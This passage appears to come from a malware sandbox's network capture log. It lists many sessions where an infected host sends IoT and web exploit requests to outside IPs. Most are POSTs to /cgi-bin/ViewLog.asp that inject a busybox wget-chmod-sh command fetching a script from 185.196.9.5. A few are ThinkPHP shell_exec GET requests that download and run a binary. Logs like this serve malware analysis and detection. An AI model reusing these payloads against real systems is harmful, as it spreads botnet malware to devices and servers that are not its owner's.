3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 64 65 36 36 35 35 66 26 23 34 36 3b 31 37 30 38 38 38 34 31 35 32 26 23 34 36 3b 31 33 39 35 31 39 64 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ade6655f.1708884152.139519d4</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.15	52402	62.182.86.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.920631886 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:32.139322996 CET	306	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 25 Feb 2024 18:02:32 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.15	43140	94.121.190.14	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.921842098 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.15	48038	94.121.23.122	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.923158884 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.15	49302	94.41.64.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:31.942367077 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.15	54804	31.200.79.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:32.144520998 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.15	56930	94.120.220.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:32.144681931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.15	33426	94.121.208.106	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:32.148250103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.15	39420	31.136.39.148	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:32.906513929 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:36.006627083 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:42.150450945 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:54.182311058 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:18.502011061 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:07.653562069 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.15	43122	31.136.151.131	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.107624054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:38.310525894 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:44.454528093 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:56.486193895 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:20.550129890 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:09.701562881 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.15	53668	94.187.114.198	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.131418943 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:36.230689049 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.15	40574	94.121.38.101	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.139868021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.15	60288	31.200.95.224	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.144570112 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.15	55106	85.122.231.26	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.474180937 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:36.038563967 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.15	34960	95.214.145.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.558728933 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.15	36296	95.217.128.111	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.560035944 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.15	48886	85.131.125.132	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.577881098 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:02:35.791620016 CET	97	IN	HTTP/1.1 404 Not Found server: owsd content-type: text/html content-length: 38
Feb 25, 2024 19:02:35.791698933 CET	97	IN	HTTP/1.1 403 Forbidden server: owsd content-type: text/html content-length: 38

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.15	49092	31.200.51.239	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:35.601104021 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.15	43394	95.217.68.189	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:36.331486940 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:36.526988983 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:02:36 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.15	41554	95.216.172.234	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:36.331769943 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:02:36.529249907 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.15	60050	94.122.20.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:02:36.355931044 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.15	59290	95.221.35.196	80

Timestamp	Bytes transferred	Direction	Data
